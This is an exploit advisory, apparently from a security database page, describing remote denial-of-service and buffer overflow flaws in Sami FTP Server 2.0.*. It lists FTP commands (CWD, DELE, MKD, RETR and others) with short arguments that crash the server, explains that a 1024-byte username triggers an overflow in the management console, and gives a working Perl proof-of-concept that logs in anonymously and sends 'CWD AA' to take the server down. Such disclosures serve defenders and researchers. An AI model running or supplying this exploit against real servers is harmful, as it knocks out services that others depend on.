Sami FTP Server 2.0.* Multiple Remote Vulnerabilities

2008.11.19
Credit: securfrog
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20

######################################################################## ########################################### # Sami FTP Server 2.0.* Multiple Remote Vulnerabilities # # Bugs : # # 1)Multiples remote denial of service (CWD,DELE,MKD,RMD,RETR,RNFR,RNTO,SIZE,STOR) # # 2)Remote Buffer overflow (Logs) # # Remote Denial of service: # APPE A => server gone # # CWD AA => server gone # # DELE AA ==> server gone # # MKD AA ==> server gone # # RMD AA ==> server gone # # RETR AA ==> server gone # # RNFR AA ==> server gone # # RNTO AA ==> server gone # # SIZE AA ==> server gone # # STOR AA ==> server gone # # # Buffer Overflow : # In the console management,you can view your logs,and set some stuff,when you open the console management a # buffer overflow occurs ,if you have send previously a request(no matter the command) with 1024 bytes to the server. # Also explorer.exe crash at the same time, 2 in 1 ;] The file is called(SamyFtp.binlog)note that this bug is # quite critical , because it will occurs all the time,when you open the console management,and you dont need to be loggued # you can simply send a username with 1024 bytes ... # # # @nolife: Life is always better when you dont know. things are clearer also smile # # # # Denial of service Poc # # use Net::FTP; (($target = $ARGV[0])) || die "usage:$0 <target> <port>"; my $user = "anonymous"; my $pass = "something"; print "Trying to connect to :$target...\n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect"; print "Connected!\n"; $ftp->login($user, $pass); $ftp->cwd("AA"); print "Poc Successfull the server should down now \n"; $ftp->quit;

References:

http://www.securityfocus.com/bid/27817
http://www.securityfocus.com/archive/1/archive/1/488198/100/200/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top